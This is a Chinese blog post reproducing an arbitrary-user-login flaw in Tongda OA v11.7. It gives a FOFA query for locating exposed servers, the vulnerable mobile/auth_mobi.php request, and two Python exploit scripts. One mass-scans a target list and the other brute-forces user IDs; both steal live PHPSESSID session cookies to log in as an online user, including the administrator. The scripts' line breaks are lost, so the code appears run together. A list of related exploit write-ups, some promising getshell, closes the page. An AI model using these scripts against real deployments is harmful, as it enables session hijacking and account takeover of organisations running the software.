【漏洞复现】通达OA v11.7 在线任意用户登录漏洞

0x00 前言

通达OA V11.7版本存在这任意用户登录漏洞，该漏洞需要管理员在线才可以登录系统，另外一个方面就是编译在线的uid值进行判断。

具体fofa语法放在下面：

app="TDXK-通达OA"

0x01 在线用户判断

访问：

http://xxx. xxx . xxx . xxx /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

如果页面时空白的，则说明管理员在线，即可以利用

如果显示RELOGIN，则不可以利用

0x02 任意用户登录

获取到uid=1的cookie

同时访问即可进行登录后台：

http://127.0.0.1/general/

0x03 POC检测脚本

通过遍历uid的值，判断用户是否上线过，实现任意用户登录，同时该谢大佬脚本，更改了一下批量测试脚本：

import requests
import sys
import random
import re
import time
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+  \033[34mVersion: 通达OA 11.7            ')print('+  \033[34mVersion: 用法：python3 poc.py http://xxx.xxx.xxx.xxx/            ')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)if "RELOGIN" in response.text and response.status_code == 200:print(target_url.replace("\n","") +"\033[31m[x] 目标用户为下线状态 --- {}\033[0m".format(time.asctime( time.localtime(time.time()))))elif response.status_code == 200 and response.text == "":PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(response.headers))print(target_url.replace("\n","") + "\033[32m[o] 用户上线 PHPSESSION: {} --- {}\033[0m".format(PHPSESSION[0] ,time.asctime(time.localtime(time.time()))))else:print("\033[31m[x] 请求失败，目标可能不存在漏洞")sys.exit(0)except Exception as e:print("\033[31m[x] 请求失败 \033[0m", e)if __name__ == '__main__':title()# target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))# while True:#     POC_1(target_url)#     time.sleep(5)# 批量检测for url in open("url.txt"):# POC_1(url)t1 = threading.Thread(target=POC_1, args=(url.replace("\n", ""),))t1.start()

网上师傅的脚本：

import requests
from bs4 import BeautifulSoup
import sys
import reurl = sys.argv[1]
for i in range(1,10000):try :vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0"resp = requests.get(vuln_url)soup = BeautifulSoup(resp.text,'html.parser')if 'RELOGIN' in soup.get_text():print("不存在")else:PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))print('uid='+str(i)+"在线"+"对应的COOKIE值是：PHPSESSID="+str(PHPSESSION[0]))breakexcept:break

转载请注明：Adminxe's Blog » 【漏洞复现】通达OA v11.7 在线任意用户登录漏洞

【漏洞复现】通达OA v11.7 在线任意用户登录漏洞相关推荐

通达OA v11.9 getdata任意命令执行漏洞复现+利用
1.产品简介通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台.包括流程审批.行政办 ...
通达OA v11.7 在线用户登录漏洞附自写poc
文章目录二.漏洞影响三.漏洞复现四.漏洞利用POC 五.总结本文就介绍了通达OA v11.7 在线用户登录漏洞利用方法,及自己写的poc. # 一.漏洞描述通达OA v11.7 中webro ...
通达OA任意用户登录漏洞复现
目录通达OA任意用户登录漏洞漏洞描述影响范围漏洞复现通达OA任意用户登录漏洞
通达OA V11.3 代码审计（文件上传、文件包含、任意用户登录漏洞）
因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了附件通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...
浪潮ClusterEngineV4.0 任意用户登录漏洞
文章目录漏洞名称漏洞描述影响版本 fofa 漏洞复现第一步登录页面第二步成功登录后台摘抄漏洞名称浪潮ClusterEngineV4.0 存在任意用户登录漏洞, 漏洞描述浪潮Clu ...
安恒明御WEB应用防火墙 report.php 任意用户登录漏洞
安恒明御WEB应用防火墙 report.php 任意用户登录漏洞一.漏洞描述二.漏洞影响三.网络测绘四.漏洞复现总结: 五.修复建议一.漏洞描述安恒明御WEB应用防火墙 report ...
通达OA前台任意用户登录漏洞+RCE漏洞复现
声明本文仅用于技术交流,请勿用于非法用途由于传播.利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任. 文章作者拥有对此文章的修改和解释权.如 ...
齐治堡垒机任意用户登录漏洞
声明:仅供漏洞检测和学习,勿用于非法测试漏洞信息浙江齐治科技股份有限公司是一家主要经营计算机软硬件.网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞, ...
通达OA v11.7 在线用户登录漏洞复现（附带一键getshell脚本）
在文章的顶部先说明,本文章所介绍的内容以及所附带的脚本仅供学习,如果存在有牟利行为,个人负责!!!仅用于学习娱乐,切勿用于非法用途!请于下载后24小时内删除,使用者承担所有法律责任!一个类似于越权的漏 ...